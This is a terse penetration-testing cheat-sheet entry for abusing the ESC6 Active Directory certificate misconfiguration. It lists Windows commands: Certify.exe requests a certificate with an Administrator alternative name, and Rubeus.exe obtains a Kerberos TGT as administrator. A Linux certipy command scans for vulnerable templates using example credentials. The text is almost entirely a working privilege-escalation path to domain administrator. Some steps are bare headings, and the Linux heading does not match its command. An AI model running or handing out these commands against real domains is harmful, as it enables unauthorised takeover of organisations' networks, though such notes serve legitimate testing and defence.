ESC6
Windows
Request a certificate abusing ESC6
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator
Convert certificate to PFX
Get a TGT as the Administrator Account
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx
Linux
Certificate Request with an alternative UPN
bob$ certipy find -u 'user1@minions.com' -p 'password1' -dc-ip <ip> -vulnerable -stdout